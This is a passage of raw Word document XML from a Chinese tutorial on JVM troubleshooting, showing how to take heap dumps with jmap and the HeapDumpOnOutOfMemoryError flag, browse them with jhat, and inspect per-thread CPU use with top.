          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="254" name="图片 3" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00CE375E">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0"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sidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/path  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>然后使用命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="255" name="图片 4" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>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sidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jmap  -dump:format=b,file=/path/heap.bin </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ID     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果只</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dump heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的存活对象，则加上选项</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-live</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="142875" cy="133350"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="59" name="图片 5" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="142875" cy="133350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="3"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sidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jmap  -dump:live,format=b,file=/path/heap.bin </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ID  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6F96">
        <w:t>jmap -dump:format=b,file=dumpFileName pid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用jmap把进程内存使用情况dump到文件中，再用jhat分析查看。jmap进行dump命令格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00102193" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C562FC">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jmap -dump:format=b,file=C:/dump.dat 6444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dump出来的文件可以用MAT、VisualVM等工具查看，这里用jhat查看：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00B20472">
        <w:t>jhat -port 9998 C:/dump.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="002525E7" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注意如果Dump文件太大，可能需要加上-J-Xmx512m这种参数指定最大堆内存，即jhat -J-Xmx512m -port 9998 /tmp/dump.dat。然后就可以在浏览器中输入主机地址:9998查看了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jhat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3490"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jhat -port 9998 /tmp/dump.dat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8602" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8602"/>
      </w:tblGrid>
      <w:tr w:rsidR="00634851" w:rsidRPr="00FC505D" w:rsidTr="00F25756">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8239" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634851" w:rsidRPr="00FC505D" w:rsidRDefault="00634851" w:rsidP="00F25756">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC505D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>top -H -p2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="282" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC505D">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>说明： -H 指显示线程，-p 是指定进程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="282" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>统计CPU使用情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00FC505D" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="282" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00505CD0">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>http://itindex.net/detail/51510-jvm-cpu-%E9%97%AE%E9%A2%98</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hprof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（Heap/CPU Profiling Tool）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
